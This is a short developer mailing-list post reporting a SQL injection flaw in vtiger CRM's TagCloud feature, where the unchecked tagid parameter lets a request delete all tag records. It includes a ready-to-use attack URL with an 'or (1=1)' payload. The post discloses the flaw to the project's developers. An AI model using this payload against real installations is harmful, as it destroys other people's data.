[Vtigercrm-developers] SQL injection attack on tag cloud feature

[Tim Smith]

I noticed that the TagCloud php file did no checking on the tagid request
variable.

You can delete all records in the tag tables by using this URL:
vtigercrm/index.php?file=TagCloud&module=Leads&action=LeadsAjax&ajxaction=DELETETAG&tagid=0%20or%20(1=1);

Tim
onwealdtim
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.vtigercrm.com/pipermail/vtigercrm-developers/attachments/20060818/62fc71bd/attachment-0004.html